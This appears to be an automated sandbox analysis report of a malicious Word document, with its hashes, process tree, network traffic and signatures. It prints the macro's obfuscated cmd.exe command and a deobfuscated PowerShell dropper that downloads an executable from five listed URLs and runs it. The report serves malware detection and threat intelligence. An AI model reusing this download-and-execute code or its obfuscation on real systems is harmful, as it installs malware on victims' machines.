Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
-
submitted
01/05/2024, 12:58 UTC
General
-
Target
0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc
-
Size
67KB
-
MD5
0bdb04d6ade94309db5aa025d012ac7f
-
SHA1
48302c12594e09eb8abe458523cfe04a9741b62e
-
SHA256
c67d226da6e85679f17b75dc0d668fc59ccacd2503b35e5e18a1d8824a140333
-
SHA512
7f3af4014ee89882bdfc26d2b4b8b35ad76611ff21307d2b2efa55b4822ff876b867957a98d42da893534e339737bfbb694fd3ead7f0f32fe3c25c8ac0ab19da
-
SSDEEP
768:UpJcaUitGAlmrJpmxlzC+w99NBC+1on79royxoJ8v:UptJlmrJpmxlRw99NBC+anep
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
1
$izs = new-object net.webclient
2
$ofj = "http://develoweb.net/1Fd3", "http://bahiacreativa.com/eu", "http://atlasbackground.com/f0x", "http://adams-moore.com/ep", "http://erush.nl/y"
3
$gsg = "225"
4
$svr = $env:public + "\\" + $gsg + ".exe"
5
foreach ($lrp in $ofj) {
6
try {
7
$izs.downloadfile($lrp, $svr)
8
invoke-item $svr
9
break
10
} catch {
11
}
12
}
13
URLs
exe.dropper
http://develoweb.net/1Fd3
exe.dropper
http://bahiacreativa.com/eu
exe.dropper
http://atlasbackground.com/f0x
exe.dropper
http://adams-moore.com/ep
exe.dropper
http://erush.nl/y
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 11 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /V^:O/C"s^e^t ^sN=^ ^ ^ ^ ^ ^ ^ ^}}^{hct^ac}^;^k^a^erb;rVS$^ me^tI^-ek^ovnI;)rVS^$ ^,^PRL^$(^eli^F^da^o^ln^w^oD^.sz^i$^{^yrt^{)Jf^O^$^ n^i^ PR^L$(hc^aer^of^;^'e^x^e.^'+G^sG$+^'\^'^+c^il^b^up^:vn^e^$=rVS$;'522'^ =^ ^Gs^G^$^;)'^@'(^til^p^S^.'^y/ln.^hsur^e//^:^p^tt^h@^p^e/^m^oc.er^oo^m^-s^m^ad^a//:^ptt^h^@x0f/m^oc.dnuorgkca^bs^a^lt^a//^:ptth@^u^e/^m^oc^.^avi^taerca^i^h^ab//^:^pt^t^h^@3^d^F^1/^t^en^.b^ewoleve^d//^:p^t^th^'=^JfO^$^;^tne^ilC^b^e^W^.t^eN^ ^tce^j^bo^-w^en^=^s^zi^$^ l^l^e^hsr^e^w^op&&^f^or /L %c ^in (3^38^;-^1^;0)d^o ^s^e^t 9^w^g=!9^w^g!!^sN:~%c,1!&&^if %c=^=^0 c^a^ll %9^w^g:~-^3^39%"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $izs=new-object Net.WebClient;$OfJ='http://develoweb.net/1Fd3@http://bahiacreativa.com/eu@http://atlasbackground.com/f0x@http://adams-moore.com/ep@http://erush.nl/y'.Split('@');$GsG = '225';$SVr=$env:public+'\'+$GsG+'.exe';foreach($LRP in $OfJ){try{$izs.DownloadFile($LRP, $SVr);Invoke-Item $SVr;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
-
DNSdeveloweb.netRemote address:8.8.8.8:53Requestdeveloweb.netIN AResponsedeveloweb.netIN A142.4.15.97 -
GEThttp://develoweb.net/1Fd3Remote address:142.4.15.97:80RequestGET /1Fd3 HTTP/1.1
Host: develoweb.net
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Wed, 01 May 2024 12:58:41 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
DNSbahiacreativa.comRemote address:8.8.8.8:53Requestbahiacreativa.comIN AResponsebahiacreativa.comIN A97.74.209.119
-
GEThttp://bahiacreativa.com/euRemote address:97.74.209.119:80RequestGET /eu HTTP/1.1
Host: bahiacreativa.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 01 May 2024 12:58:41 GMT
Server: Apache
Location: https://bahiacreativa.com/eu
Content-Length: 236
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
DNSatlasbackground.comRemote address:8.8.8.8:53Requestatlasbackground.comIN AResponseatlasbackground.comIN A192.185.225.112
-
GEThttp://atlasbackground.com/f0xRemote address:192.185.225.112:80RequestGET /f0x HTTP/1.1
Host: atlasbackground.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 01 May 2024 12:58:42 GMT
Server: Apache
Location: https://atlasbackground.com/f0x
Content-Length: 239
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
DNSadams-moore.comRemote address:8.8.8.8:53Requestadams-moore.comIN AResponseadams-moore.comIN A172.67.178.191adams-moore.comIN A104.21.75.165
-
GEThttp://adams-moore.com/epRemote address:172.67.178.191:80RequestGET /ep HTTP/1.1
Host: adams-moore.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 01 May 2024 12:58:43 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 01 May 2024 13:58:43 GMT
Location: https://adams-moore.com/ep
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbtnyZ6Yv7iib7FUJCVHaIewUVIBTvMLIRZQSJ27wW2Vwa95wsrMipdD8HUzFfP5JMFV8djBfqm8qxdfrRZUkWi8P1J0%2F1q9GgsIRktDUx7yygEmygL4ZD4PwV09HyGS4LI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cff1d3dd9d951a-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://adams-moore.com/epRemote address:172.67.178.191:443RequestGET /ep HTTP/1.1
Host: adams-moore.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Wed, 01 May 2024 12:58:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-edge-cache: cache,platform=wordpress
Cache-Control: no-cache, must-revalidate, max-age=0
Location: https://www.adams-moore.com/ep
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Set-Cookie: X-Mapping-pokiblok=7A2DFF30680F9469349BF891651EC5A1; path=/
X-Redirect-By: WordPress
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vvgEoXNXjTOm2yX7hG72Xpmd4bJn9xWwLI3YGWinLBsQIJAeTupC5Q7CYy9u%2FXcuOpl1vvq%2B56cLqdDm1sXBpY9gUWcSFbmU3QPg%2FyjWPirGoAvCkOY2dHaLp6PvfhkE2Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cff1d52e2f79b9-LHR
alt-svc: h3=":443"; ma=86400
-
DNSwww.adams-moore.comRemote address:8.8.8.8:53Requestwww.adams-moore.comIN AResponsewww.adams-moore.comIN A172.67.178.191www.adams-moore.comIN A104.21.75.165
-
GEThttps://www.adams-moore.com/epRemote address:172.67.178.191:443RequestGET /ep HTTP/1.1
Host: www.adams-moore.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Wed, 01 May 2024 12:58:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-edge-cache: cache,platform=wordpress
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.adams-moore.com/wp-json/>; rel="https://api.w.org/"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Set-Cookie: X-Mapping-pokiblok=36A6EDA834F42D3A7713A725AB4B4285; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijazwvPjmpwozUchVA30Q8uTl1%2BkzQTgQ4uoaHreORbmrYCoDnwHbXiBvQOUWNVkkDE4amz0K5K3YyDT1QIomcsssj9p175Gjs3FbvknQIXcAPbb8CcDycdL8AbEN0uZsiTUDGtd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cff1dcf94a956c-LHR
alt-svc: h3=":443"; ma=86400
-
DNSerush.nlRemote address:8.8.8.8:53Requesterush.nlIN AResponseerush.nlIN A3.64.163.50
-
GEThttp://erush.nl/yRemote address:3.64.163.50:80RequestGET /y HTTP/1.1
Host: erush.nl
Connection: Keep-Alive
ResponseHTTP/1.1 410 Gone
Server: openresty
Date: Wed, 01 May 2024 12:58:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
-
142.4.15.97:80http://develoweb.net/1Fd3http
HTTP Request
GET http://develoweb.net/1Fd3HTTP Response
404 -
97.74.209.119:80http://bahiacreativa.com/euhttp
HTTP Request
GET http://bahiacreativa.com/euHTTP Response
301 -
97.74.209.119:443bahiacreativa.comtls
-
97.74.209.119:443bahiacreativa.comtls
-
192.185.225.112:80http://atlasbackground.com/f0xhttp
HTTP Request
GET http://atlasbackground.com/f0xHTTP Response
301 -
192.185.225.112:443atlasbackground.comtls
-
192.185.225.112:443atlasbackground.comtls
-
172.67.178.191:80http://adams-moore.com/ephttp
HTTP Request
GET http://adams-moore.com/epHTTP Response
301 -
172.67.178.191:443https://adams-moore.com/eptls, http
HTTP Request
GET https://adams-moore.com/epHTTP Response
301 -
172.67.178.191:443https://www.adams-moore.com/eptls, http
HTTP Request
GET https://www.adams-moore.com/epHTTP Response
404 -
3.64.163.50:80http://erush.nl/yhttp
HTTP Request
GET http://erush.nl/yHTTP Response
410
-
8.8.8.8:53develoweb.netdns
DNS Request
develoweb.net
DNS Response
142.4.15.97
-
8.8.8.8:53bahiacreativa.comdns
DNS Request
bahiacreativa.com
DNS Response
97.74.209.119
-
8.8.8.8:53atlasbackground.comdns
DNS Request
atlasbackground.com
DNS Response
192.185.225.112
-
8.8.8.8:53adams-moore.comdns
DNS Request
adams-moore.com
DNS Response
172.67.178.191104.21.75.165
-
8.8.8.8:53www.adams-moore.comdns
DNS Request
www.adams-moore.com
DNS Response
172.67.178.191104.21.75.165
-
8.8.8.8:53erush.nldns
DNS Request
erush.nl
DNS Response
3.64.163.50
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5e3ac2a2e11ef73accd8d22a5de1a3b80
SHA1d5137d9ed6cbe3fb3890f8b31b58743b37477215
SHA2569105b545248baf30de2d7c37002c379a9daf63f3500d178ff978ce4a6c949ea7
SHA5128f72e2193f297054ba7ecb62fd63f2f3d6e7c0e4fb71ab679171a800e3aa602f0989636928d5c3789861a10ef8690cc82b8fdc61a365378ae607f6f874c73c0b
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB